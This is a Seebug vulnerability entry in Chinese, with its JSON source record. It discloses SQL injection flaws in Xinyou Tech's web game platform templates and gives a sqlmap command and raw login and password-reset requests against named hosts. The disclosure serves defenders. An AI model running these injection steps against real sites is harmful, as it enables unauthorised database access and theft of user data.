Search...

信游科技页游平台模板多处SQL注入漏洞

2014-01-14T00:00:00

ID SSV:95089
Type seebug
Reporter Root
Modified 2014-01-14T00:00:00

Description

简要描述：

信游科技各大模板多处SQL注入漏洞，所有模板，均存在相应漏洞

详细说明：

1.用户登录处未对用户名uid进行过滤，导致SQL注入为避免影响，以测试站点为例：

sqlmap.py -r "C:\1.txt" -p "uid" --tables

POST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1 Host: xy003.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://xy003.52xinyou.cn/index.html Content-Length: 28 Cookie: xinyoukeji=2055191 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache uid=test&pwd=12345&rem=false

2.忘记密码处,用户账户同样存在这个问题

POST /api/webaction.ashx HTTP/1.1 Host: xy006.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://xy006.52xinyou.cn/user/findpass.html Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 152 posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=&button2=%E6%8F%90+%E4%BA%A4

漏洞证明：

JSON Vulners Source

Initial Source

{"sourceData": "", "status": "details", "history": [], "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u4fe1\u6e38\u79d1\u6280\u5404\u5927\u6a21\u677f\u591a\u5904SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6240\u6709\u6a21\u677f\uff0c\u5747\u5b58\u5728\u76f8\u5e94\u6f0f\u6d1e\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n1.\u7528\u6237\u767b\u5f55\u5904\u672a\u5bf9\u7528\u6237\u540duid\u8fdb\u884c\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\n\u4e3a\u907f\u514d\u5f71\u54cd\uff0c\u4ee5\u6d4b\u8bd5\u7ad9\u70b9\u4e3a\u4f8b\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg\" alt=\"sqltest3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg)\n\n\n\n\n```\nsqlmap.py -r \"C:\\1.txt\" -p \"uid\" --tables\n```\n\n\n\n\n```\nPOST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1\nHost: xy003.52xinyou.cn\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0\nAccept: */*\nAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nDNT: 1\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: http://xy003.52xinyou.cn/index.html\nContent-Length: 28\nCookie: xinyoukeji=2055191\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nuid=test&pwd=12345&rem=false\n```\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg\" alt=\"sqltest2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg)\n\n\n2.\u5fd8\u8bb0\u5bc6\u7801\u5904,\u7528\u6237\u8d26\u6237\u540c\u6837\u5b58\u5728\u8fd9\u4e2a\u95ee\u9898\n\n\n```\nPOST /api/webaction.ashx HTTP/1.1\nHost: xy006.52xinyou.cn\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nDNT: 1\nReferer: http://xy006.52xinyou.cn/user/findpass.html\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 152\nposttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=&button2=%E6%8F%90+%E4%BA%A4\n```\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg\" alt=\"sqltest1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg)\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg\" alt=\"sqltest2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg\" alt=\"sqltest1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg)", "sourceHref": "", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-95089", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 0, "references": [], "lastseen": "2017-11-19T17:36:07", "published": "2014-01-14T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:95089", "enchantments_done": [], "modified": "2014-01-14T00:00:00", "title": "\u4fe1\u6e38\u79d1\u6280\u9875\u6e38\u5e73\u53f0\u6a21\u677f\u591a\u5904SQL\u6ce8\u5165\u6f0f\u6d1e", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T17:36:07"}, "dependencies": {"references": [], "modified": "2017-11-19T17:36:07"}, "vulnersScore": 0.1}, "_object_type": "robots.models.seebug.SeebugBulletin"}